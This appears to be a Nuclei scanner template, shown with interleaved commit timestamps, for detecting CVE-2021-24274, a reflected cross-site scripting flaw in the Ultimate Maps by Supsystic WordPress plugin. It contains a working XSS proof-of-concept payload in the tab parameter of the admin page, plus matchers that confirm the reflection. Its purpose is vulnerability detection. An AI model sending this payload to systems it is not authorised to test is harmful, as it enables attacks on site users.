2021-09-28 17:11:56 +00:00
id : CVE-2021-24274
info :
name : Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
author : dhiyaneshDK
2021-09-28 17:13:05 +00:00
severity : medium
2021-09-28 18:50:48 +00:00
description : The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2021-09-28 17:11:56 +00:00
reference :
- https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
2021-09-28 18:50:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24274
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
2021-09-28 17:13:05 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-28 17:13:05 +00:00
cve-id : CVE-2021-24274
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps
2021-09-28 17:11:56 +00:00
requests :
- method : GET
path :
2021-09-28 18:50:48 +00:00
- '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-28 17:11:56 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-09-28 18:50:48 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-28 17:11:56 +00:00
condition : and
- type : status
status :
- 200
- type : word
words :
- "text/html"
part : header